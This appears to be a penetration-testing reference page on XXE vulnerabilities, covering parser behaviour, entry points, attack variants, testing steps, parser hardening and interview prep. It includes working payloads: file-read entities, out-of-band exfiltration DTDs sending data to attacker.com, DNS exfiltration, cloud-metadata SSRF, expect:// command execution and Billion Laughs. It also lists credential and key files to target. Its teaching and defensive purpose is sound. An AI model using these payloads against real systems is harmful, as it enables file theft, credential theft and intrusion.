On this page
XML External Entity (XXE)
1. What Is XXE
XXE is a vulnerability where an XML parser resolves external entities, letting an attacker read files, make server-side requests, and (sometimes) execute code.
Attacker → XML with malicious DTD → Parser → Resolves entity
↓
file:///etc/passwd
http://169.254.169.254/...
http://internal-service/...
The key point: the parser itself fetches data from the URI in SYSTEM — the attacker just tells it where to go.
This isn't a bug in application code — it's the design of the XML specification from 1998, which most parsers support by default. External entity support was a feature, not a bug. The problem is that "any URI" includes file://, http://, ftp://, and sometimes expect://.
2. Fundamentals: XML, DTD, Entities
XML Entity
An entity is a variable in XML. It's declared in the DTD and used in the document or within the DTD itself.
Two Ways to Classify Entities
By value source:
| Type | Value | Example |
|---|---|---|
| Internal | Defined directly in DTD | <!ENTITY name "John"> |
| External | Loaded from a file/URL | <!ENTITY name SYSTEM "file:///etc/passwd"> |
By usage location:
| Type | Syntax | Where it works | Used for |
|---|---|---|---|
| General entity | &name; | In the XML document body | Classic XXE |
| Parameter entity | %name; | Only inside the DTD | Blind XXE (OOB) |
<!-- General entity — in the document body -->
<!ENTITY xxe SYSTEM "file:///etc/passwd">
<foo>&xxe;</foo>
<!-- Parameter entity — inside the DTD -->
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY send SYSTEM 'http://attacker.com/?d=%file;'>">
%eval;
Why parameter entities matter: in blind XXE you need to build the payload inside the DTD — read a file and embed its contents into a URL. General entities can't do that — they only work in the body. Parameter entities let you substitute values directly within the DTD, building dynamic constructs.
Parameter Entity Restriction in the Internal DTD Subset
Per the XML spec, you cannot define a parameter entity and use it to create new entities within the same internal DTD subset. This means a construct like <!ENTITY % a "..."> <!ENTITY % b "<!ENTITY % c SYSTEM '...'> %a;"> %b; inside <!DOCTYPE foo [ ... ]> won't work — the parser rejects it.
This is exactly why blind XXE requires an external DTD — parameter entities only work fully in an external DTD. It explains why blind XXE always loads evil.dtd from the attacker's server: only inside a loaded DTD file does the parser allow free combination of parameter entities, enabling substitution chains.
Exception — the trick with redefining an entity from a local system DTD (described in section 4, Error-based via entity redefinition). In this case you load a legitimate DTD file from the server itself and redefine one of its entities with your payload.
DTD (Document Type Definition)
DTD is a set of rules describing XML structure. Entities are declared in the DTD.
No DTD = no entity declarations = no XXE.
Where the DTD can live:
<!-- 1. Internal DTD — inside the document itself (between [ and ]) -->
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<foo>&xxe;</foo>
<!-- 2. External DTD — loaded from a URL -->
<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://attacker.com/evil.dtd">
<foo>&xxe;</foo>
<!-- 3. Combined — internal + external -->
<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://attacker.com/evil.dtd" [
<!ENTITY % local "value">
]>
3. Where to Look for XXE
Obvious Entry Points
- API endpoints with
Content-Type: application/xmlortext/xml - SOAP services (the entire protocol is XML-based)
- XML file uploads (configs, feeds, data)
- RSS/Atom import
Less Obvious Entry Points
- SVG uploads — SVG is XML
- DOCX/XLSX/PPTX uploads — ZIP archives with XML inside
- GPX uploads — geodata in XML
- XHTML — HTML in XML format
- SAML — XML-based authentication
- PDF generation from XML/XSLT
- Configuration files —
.xml,.plist,.svg
Content-Type Swap (JSON → XML)
If the application accepts JSON, try switching the format:
# Before:
POST /api/user HTTP/1.1
Content-Type: application/json
{"name": "test", "email": "test@test.com"}
# After:
POST /api/user HTTP/1.1
Content-Type: application/xml
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<user>
<name>&xxe;</name>
<email>test@test.com</email>
</user>
Why this works: frameworks (Spring, ASP.NET, Rails) often pick the parser automatically based on Content-Type. If the XML parser is enabled and not hardened — XXE.
Also check: text/xml, application/xhtml+xml, image/svg+xml.
4. XXE Types
4.1 Classic (Non-blind) XXE
The parser response is displayed — file contents are visible in the response.
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<foo>&xxe;</foo>
Server response:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...
4.2 Blind XXE
The parser response is not displayed. Three approaches:
OOB (Out-of-Band) — Sending Data Out
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
%dtd;
]>
<foo>&send;</foo>
evil.dtd on the attacker's server:
<!ENTITY % all "<!ENTITY send SYSTEM 'http://attacker.com/?d=%file;'>">
%all;
The chain:
- Parser reads
/etc/hostname→ into%file - Loads
evil.dtd→ into%dtd %allassembles a new entitysendwith data in the URL&send;triggers an HTTP request to attacker.com carrying the data
Tools for receiving: Burp Collaborator, interactsh, your own server with python3 -m http.server.
Error-based — Data in the Error Message
Useful when a firewall blocks outbound connections (OOB doesn't work).
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % dtd SYSTEM "http://attacker.com/error.dtd">
%dtd;
]>
<foo>&trigger;</foo>
error.dtd:
<!ENTITY % all "<!ENTITY trigger SYSTEM 'file:///nonexistent/%file;'>">
%all;
The parser tries to open file:///nonexistent/web-server-01 → error:
java.io.FileNotFoundException: /nonexistent/web-server-01
→ File contents in the error text.
Error-based via Entity Redefinition (No Outbound Connections)
If you can't even load evil.dtd, but there's a local DTD on the server:
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
<!ENTITY % ISOamso '
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;
'>
%local_dtd;
]>
<foo>bar</foo>
You redefine an entity from the local DTD, injecting your payload. This is the only exploitation method when outbound connections are fully blocked — no external DTD needed, everything happens locally.
4.3 XXE → SSRF
XXE is a full-fledged vector for SSRF:
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
]>
<foo>&xxe;</foo>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://internal-service:8080/admin">
]>
<foo>&xxe;</foo>
All SSRF techniques apply: cloud metadata, port scanning, accessing internal services.
4.4 XXE → DoS (Billion Laughs)
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!-- ... -->
]>
<foo>&lol9;</foo>
9 levels of nesting = 10^9 copies of the string "lol" — gigabytes in parser memory. Exponential expansion = the parser eats all available memory.
Doesn't leak data, but useful for:
- Confirming DTD processing — if Billion Laughs works, the parser processes entities, so you can try XXE
- DoS attacks — taking the service down
5. XInclude
When It Applies
You don't control the entire XML document — only a piece of data that gets inserted into XML on the server. You can't declare a DOCTYPE (it must be at the beginning of the document).
Example: your input (username, comment) gets embedded into an XML template on the backend.
Payload
<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/>
</foo>
xmlns:xi— namespace declaration for XIncludeparse="text"— read as text (without this the parser expects valid XML)- No DOCTYPE needed
- Only works if the parser supports XInclude (libxml2, Xerces, most Java parsers)
Hands-on exercise: XInclude Attack (PortSwigger).
6. XXE via File Formats
SVG
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE svg [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<svg xmlns="http://www.w3.org/2000/svg" width="200" height="200">
<text x="0" y="20">&xxe;</text>
</svg>
Upload as an avatar/image → if the server parses SVG (e.g., converts to PNG) → XXE.
DOCX / XLSX
- Create a normal
.docxfile - Unzip it (it's a ZIP):
unzip document.docx -d doc_extracted - Edit
doc_extracted/word/document.xml— insert DTD with payload - Re-zip:
cd doc_extracted && zip -r ../evil.docx . - Upload to the server
Files inside DOCX where you can insert the payload:
word/document.xml[Content_Types].xml_rels/.rels
7. The Bad Character Problem and Bypasses
The Problem
When the parser substitutes file contents, it tries to parse them as XML. If the file contains <, &, ]]> — the parser breaks.
file:///etc/passwd ✅ — no special characters
file:///var/www/config.php ❌ — full of < and &
file:///etc/fstab ❌ — may contain &
Bypass 1: PHP Filter (If the Server Runs PHP)
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/var/www/html/config.php">
The file arrives in base64 — no special characters. Decode on your end.
Bypass 2: CDATA Wrapper via Parameter Entities
evil.dtd:
<!ENTITY % file SYSTEM "file:///var/www/html/config.php">
<!ENTITY % start "<![CDATA[">
<!ENTITY % end "]]>">
<!ENTITY % all "<!ENTITY wrapped '%start;%file;%end;'>">
%all;
Main XML:
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
%dtd;
]>
<foo>&wrapped;</foo>
File contents get wrapped in CDATA → the parser doesn't interpret special characters.
Bypass 3: jar:// Protocol (Java)
jar:http://attacker.com/evil.jar!/file.txt
Java-specific — downloads the archive, extracts it, reads the file inside. Can be used to bypass protocol restrictions.
8. Exploitation: What to Read
System Files
Linux:
file:///etc/passwd
file:///etc/shadow — password hashes (needs root)
file:///etc/hostname
file:///proc/self/environ — environment variables (secrets, keys)
file:///proc/self/cmdline — process arguments
file:///home/user/.ssh/id_rsa — private SSH key
file:///home/user/.bash_history — command history
Windows:
file:///C:/Windows/win.ini
file:///C:/Windows/System32/drivers/etc/hosts
file:///C:/Users/Administrator/.ssh/id_rsa
file:///C:/inetpub/wwwroot/web.config
Application Configs
file:///var/www/html/config.php
file:///var/www/html/.env
file:///var/www/html/wp-config.php
file:///opt/app/application.properties — Spring Boot
file:///opt/app/application.yml
file:///etc/nginx/nginx.conf
file:///etc/apache2/sites-enabled/000-default.conf
Cloud Metadata (XXE → SSRF)
http://169.254.169.254/latest/meta-data/iam/security-credentials/ — AWS
http://metadata.google.internal/computeMetadata/v1/ — GCP
http://169.254.169.254/metadata/instance — Azure
More on SSRF: SSRF (Server-Side Request Forgery).
9. XXE via XSLT
If the server performs XSLT transformations, the document() function in XSLT can be used to read files and make HTTP requests — similar to XXE, but through a different mechanism. This is a separate attack surface, unrelated to DTD and entities.
File Read via XSLT
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">
<xsl:template match="/">
<xsl:copy-of select="document('file:///etc/passwd')"/>
</xsl:template>
</xsl:stylesheet>
SSRF via XSLT
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">
<xsl:template match="/">
<xsl:copy-of select="document('http://169.254.169.254/latest/meta-data/')"/>
</xsl:template>
</xsl:stylesheet>
Why This Works
XSLT processors (Xalan, Saxon, libxslt) allow document() by default. The function is meant for loading additional XML documents during transformation, but it supports arbitrary URIs — including file:// and http://.
Important: even if the application has fully disabled DTD and external entities in the XML parser, XSLT transformation can still be vulnerable. These are two different mechanisms, and defending against one doesn't protect against the other.
10. Chaining with Other Vulnerabilities
XXE rarely exists in a vacuum — exploitation often builds on chains with other vulnerabilities:
| Chain | How it works | Impact |
|---|---|---|
| XXE → SSRF | External entity with http:// URI | Cloud metadata, internal services |
| XXE → LFI | Reading source code → finding new vulnerabilities | Secret disclosure, further escalation |
| Blind XXE + DNS | DNS exfiltration works even through strict HTTP firewalls | Confirming the vulnerability, slow exfiltration |
| XXE → RCE | expect:// (PHP), jar:// chains, XSLT code execution | Full server control |
| SSRF → XXE | SSRF to an internal service that parses XML | Reading local files on the internal server |
XXE → RCE (PHP + expect)
The expect:// URI scheme in PHP executes shell commands:
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "expect://id">
]>
<foo>&xxe;</foo>
If the server returns uid=33(www-data)... — that's RCE. Requirements: PHP + the expect extension loaded. Rare in production, common in CTFs.
DNS Exfiltration
When outbound HTTP is fully blocked, DNS queries often get through:
<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY send SYSTEM 'http://%file;.attacker.com/'>">
%eval;
Data arrives as a subdomain in the DNS query — track it via Burp Collaborator or interactsh.
More on SSRF: SSRF (Server-Side Request Forgery).
11. Testing Methodology
Step 1: Discover Entry Points
- Find all endpoints that accept XML (Content-Type, SOAP, files)
- Check file uploads: SVG, DOCX, XLSX, XML
- Try swapping Content-Type from JSON to XML
- Check SAML endpoints
Step 2: Test DTD Processing
Send a harmless payload — if the parser processes DTD, XXE is possible:
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe "testvalue">
]>
<foo>&xxe;</foo>
If the response contains testvalue → DTD is processed → try an external entity.
Step 3: Determine the Type
| Situation | Type | Approach |
|---|---|---|
| Parser response is visible | Classic | SYSTEM "file:///etc/passwd" |
| Response not visible, outbound allowed | Blind OOB | Parameter entities + external DTD |
| Response not visible, outbound blocked | Blind Error-based | Error with data or local DTD |
| You don't control DOCTYPE | XInclude | xi:include |
Step 4: Exploitation
1. file:///etc/passwd → confirm file read
2. file:///proc/self/environ → secrets from env
3. file:///home/user/.ssh/id_rsa → SSH keys
4. http://169.254.169.254/... → cloud credentials
5. http://internal:PORT/... → SSRF to internal services
6. php://filter/... → read PHP code (base64)
Step 5: If It Doesn't Work
- Try other protocols:
file://,http://,php://,jar:// - Try parameter entities instead of general
- Try XInclude
- Try the error-based approach
- Try via files (SVG, DOCX)
- Check other Content-Type values
- Try UTF-16 encoding (some filters only check for DOCTYPE in ASCII)
- Split the payload across multiple entity definitions
12. XXE Defense
The Right Approach — Disable DTD / External Entities
Java (DocumentBuilderFactory) — most reliable:
// Disallow DOCTYPE entirely
factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
Java (SAXParserFactory):
factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
Python (lxml):
parser = etree.XMLParser(resolve_entities=False, no_network=True)
PHP:
libxml_disable_entity_loader(true); // PHP < 8.0
// In PHP 8.0+ external entities are disabled by default
C# (.NET):
XmlReaderSettings settings = new XmlReaderSettings();
settings.DtdProcessing = DtdProcessing.Prohibit;
Ruby (Nokogiri):
Nokogiri::XML(xml) { |config| config.nonet }
The LIBXML_NOENT Trap in PHP
// VULNERABLE — ENABLES entity substitution:
$doc = simplexml_load_string($xml, 'SimpleXMLElement', LIBXML_NOENT);
// SAFE — without the flag:
$doc = simplexml_load_string($xml);
LIBXML_NOENT = "substitute entity values into text" → the parser resolves external entities → XXE.
The name is misleading: "NO ENT" looks like "no entities", but it actually means "no entities in the output" (replace them with their values).
Parser Defaults by Language and Version
| Language / Library | Safe by default? | Since version | Note |
|---|---|---|---|
Java DocumentBuilderFactory | No | — | Requires explicit configuration even in Java 17+ |
Java SAXParserFactory | No | — | Same |
PHP simplexml_load_string | Yes | PHP 8.0+ | PHP <8 needs libxml_disable_entity_loader(true) |
PHP + LIBXML_NOENT | NO! | — | The flag enables entity substitution (trap) |
Python lxml | Yes | 4.6+ | resolve_entities=False, no_network=True by default |
Python defusedxml | Yes | always | Purpose-built for safe parsing |
Python xml.etree.ElementTree | Partially | — | Doesn't support external entities, but vulnerable to Billion Laughs |
.NET XmlReader | Yes | .NET Core | In .NET Framework depends on version |
Ruby Nokogiri | Yes | 1.13+ | NONET by default |
| libxml2 | Yes | 2.9+ | But LIBXML_NOENT breaks the protection |
General Principles
- Disable DTD entirely — don't try to filter individual entities
- Don't trust defaults — in many languages external entities are enabled by default
- Validate Content-Type — don't accept XML if you're not expecting it
- Parse files safely — SVG, DOCX, XLSX should be parsed with entities disabled
- Don't filter input data — filters get bypassed (UTF-16, parametric entities)
- Don't use XML where JSON would work
- Check parsers for all formats that can contain XML: SVG, DOCX, XLSX, SAML
- Track specific versions of libraries and their defaults — don't rely on "probably safe"
13. Severity Assessment
| Severity | Conditions |
|---|---|
| Critical | Reading arbitrary files with secrets, cloud credentials via SSRF, RCE via chain |
| High | Reading system files (/etc/passwd, configs), SSRF to internal network |
| Medium | Blind XXE with limited exfiltration, SSRF only to specific hosts |
| Low | DoS only (Billion Laughs), DTD is processed but external entities are blocked |
14. Tools
| Tool | Purpose |
|---|---|
| Burp Suite | Intercepting requests, swapping Content-Type, testing payloads |
| Burp Collaborator / interactsh | Confirming blind XXE (OOB callback) |
| XXEinjector | Automating XXE exploitation (OOB, error-based) |
| oxml_xxe | Generating DOCX/XLSX/PPTX with XXE payloads |
| docem | Embedding XXE into DOCX/XLSX/ODT |
| python3 -m http.server | Quick server for receiving OOB and serving evil.dtd |
15. Notable Cases
Facebook (2014, Bug Bounty):
Blind XXE via DOCX upload on the careers portal → reading /etc/passwd. Bounty $30,000+.
Uber (2016, Bug Bounty): XXE in the SAML parser → reading arbitrary files from the server.
Google (2014, Bug Bounty): XXE via XLSX upload in the Google Toolbar button gallery.
PortSwigger Research: XXE via SVG in avatar uploads — a common pattern in real-world applications.
16. Q&A — Prep Questions
1. What is XXE?
A vulnerability in XML parsers where the parser resolves external entities defined in the DTD. The attacker specifies a URI via SYSTEM — the parser automatically fetches the file or URL contents and substitutes them into the document. This isn't a bug in application code — it's the design of the XML specification from 1998, which most parsers support by default.
2. What's the key prerequisite for XXE?
The parser must process DTD (Document Type Definition) and support external entities. No DTD means no entity declarations means no XXE. If DOCTYPE is prohibited at the parser level — the attack is impossible (except for XInclude, which works without DTD).
3. What's the typical impact of XXE?
Reading arbitrary files (file:///etc/passwd, configs, SSH keys, .env), SSRF to internal services and cloud metadata (IAM keys), DoS via Billion Laughs. In rare cases — RCE via expect:// (PHP) or a deserialization chain. Blind XXE adds OOB exfiltration and error-based data leaks.
4. How does XXE differ from regular XML injection?
XML injection is about manipulating the structure of an XML document (inserting tags, changing values). XXE exploits the parser's own capabilities through DTD and entities. XXE doesn't change XML logic — it makes the parser load external resources. These are different levels of attack: injection works with data, XXE works with the parsing mechanism.
5. What is blind XXE?
A situation where the parser resolves external entities, but the result isn't displayed in the response. Exploitation goes through three channels: OOB (out-of-band) — sending data via HTTP/DNS request to the attacker's server using parameter entities and an external DTD; error-based — triggering an error whose text contains the data; redefining an entity from a local system DTD when outbound connections are blocked.
6. How does XXE turn into SSRF?
Replace file:// with http:// in the SYSTEM URI. The parser makes an HTTP request to the specified address — including internal addresses (169.254.169.254 for cloud metadata, localhost:PORT for internal services). XXE is one of the simplest vectors for SSRF, because the parser makes the request automatically.
7. Why is "we blocked DOCTYPE" not always the end of the story?
XInclude doesn't require DOCTYPE — it works through an XML namespace and can be injected even when the attacker only controls part of the XML document. XSLT transformations use document() to load external resources — a separate vector, unrelated to DTD. SVG, DOCX, XLSX are XML formats that may be processed by other parsers with different settings.
8. Why is it dangerous to rely on "our parser is safe by default"?
Java DocumentBuilderFactory is vulnerable by default even in Java 17+. PHP with the LIBXML_NOENT flag enables entity substitution (the name is misleading). Python xml.etree.ElementTree doesn't support external entities but is vulnerable to Billion Laughs. Every parser requires checking the specific version and configuration — there's no universal "safe by default".
9. What is Billion Laughs and why is it discussed alongside XXE?
An attack based on nested entities where each level references the previous one 10 times — exponential expansion. 9 levels of nesting = 10^9 copies of the string "lol" — gigabytes in parser memory. Doesn't leak data, but confirms DTD processing (if Billion Laughs works — the parser processes entities, you can try XXE). Some parsers are protected against external entities but vulnerable to Billion Laughs.
10. What does proper XXE defense look like?
Disable DTD entirely at the parser level (disallow-doctype-decl in Java, DtdProcessing.Prohibit in .NET). Don't filter input data — filters get bypassed (UTF-16, parametric entities). Don't use XML where JSON would work. Check parsers for all formats that can contain XML: SVG, DOCX, XLSX, SAML. Track specific library versions and their defaults — don't rely on "probably safe".
17. Quick Reference Cheatsheet
XXE = parser resolves external entities from DTD
Entities:
internal/external — where the value comes from
general (&name;) / parameter (%name;) — where it's used
Parameter entities → for blind XXE (work inside DTD)
Parameter entities in internal DTD subset are restricted →
need external DTD (or the local DTD trick)
Where: XML API, SOAP, SVG, DOCX/XLSX, Content-Type swap JSON→XML,
SAML, GPX, XHTML, PDF generation from XSLT
Types:
Classic → response visible, SYSTEM "file:///..."
Blind OOB → parameter entities + evil.dtd → HTTP callback
Error-based → data in the error message (when OOB is blocked)
Local DTD → entity redefinition from system DTD (no outbound)
XInclude → no control over DOCTYPE
XSLT → document() for file read and HTTP (no DTD)
Payload (basic):
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<foo>&xxe;</foo>
Bad characters (< &):
PHP → php://filter/convert.base64-encode/resource=...
General → CDATA wrapper via parameter entities
Java → jar:// to bypass restrictions
Chains:
XXE→SSRF, XXE→LFI, XXE→RCE (expect://),
Blind XXE+DNS, SSRF→XXE
Targets: /etc/passwd, .env, SSH keys, cloud metadata, internal APIs
Defense:
Disable DTD entirely (disallow-doctype-decl)
LIBXML_NOENT → ENABLES substitution (trap!)
Java is vulnerable by default even in 17+
Python xml.etree — no external entities, but has Billion Laughs
Don't filter — disable. Not XML — JSON.
Severity: files with secrets / cloud keys = critical,
/etc/passwd = high, blind = medium, DoS = low
More in this category
Web Shell Upload via Extension Blacklist Bypass (PortSwigger Lab)
.php is blacklisted, but .htaccess uploads without complaint — we slip our own Apache config in and make the server execute shell.bug as PHP.
Web Shell Upload via Obfuscated File Extension (PortSwigger Lab)
Extension blacklist rejects .php and a double-extension shell.php.jpg is served as an image — a null byte in shell.php%00.jpg bypasses both checks.
Remote Code Execution via Web Shell Upload (PortSwigger Lab)
Avatar upload has no validation — drop a PHP web shell and read /home/carlos/secret.